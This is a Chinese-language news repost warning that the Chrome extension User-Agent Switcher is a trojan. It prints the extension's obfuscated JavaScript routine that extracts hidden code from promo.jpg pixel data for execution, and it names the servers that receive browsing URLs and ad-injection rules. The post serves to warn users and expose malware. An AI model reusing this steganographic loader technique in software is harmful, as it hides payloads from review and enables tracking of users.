当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com7年前 (2017-09-10)短网址资讯3832
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

分享给朋友:

相关文章

京东“入股”社区生鲜超市“钱大妈”

京东“入股”社区生鲜超市“钱大妈”

对生鲜,及社区市场的争夺正趋白热化。多位知情人士告诉《商业观察家》,京东集团战略与投资副总裁常斌旗下投资基金——启承资本,主导参与了社区生鲜零售商钱大妈的新一轮融资。一些市场人士称,“社区便利店+同城配”模式将可能是京东未来线上线下布局重点...

iPhone X再见,我们来看看iPhone X的8大缺点

前几天苹果举行了新品发布会,这次带来了三部手机,iPhone8和iPhone8 Plus以及iPhone X,iPhone8在外观上和iPhone7的一样的,不同的是使用了玻璃材质。当然,不可否认,作为苹果iPhone十周年的纪念款机型,i...

高效排查短网址系统故障:高并发引起的系统设计“踩坑”案例

高效排查短网址系统故障:高并发引起的系统设计“踩坑”案例

短网址的判定逻辑十分复杂,一方面是各种类型的网址,有正常的短链接,另外是短网址保证用户的使用,特别是商家的影响面非常广,任何一个小故障都可能引发一些社会问题,所以FT12短网址对产品的质量,对服务的连续性有严格的要求。FT12短网址的技术人...

车震应该怎么办?

车震应该怎么办?

别想歪啦了~想歪了的自己去面壁!你以为是这样的?或者是这样的?又或者是这样的?no,no,no,其实是这样的!?有一次坐着车,突然,突然车就抖了起来,这是车在震我!后来才知道,汽车抖动是常见的故障之一,其中又分为怠速的时候抖动与行车中的抖动...

三江购物再设子公司 或阿里加码新零售布局

【FT12短网址资讯】7月18日消息,据亿邦动力网获悉,7月17日晚间,三江购物发布公告称,为满足业务发展需要,三江购物全资子公司浙江浙海华地网络科技有限公司(以下简称“浙江浙海华地”)拟以自有3000万元人民币投资设立全资子公司杭州浙海华...

从代码层面优化系统性能的解决方案

从代码层面优化系统性能的解决方案

我们以前看到的很多架构变迁或者演进方面的文章大多都是针对架构方面的介绍,很少有针对代码级别的性能优化介绍。本文将针对一些代码细节方面的东西进行介绍,欢迎大家吐槽以及提建议。 写在前面 在 上一篇 我们主要介...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。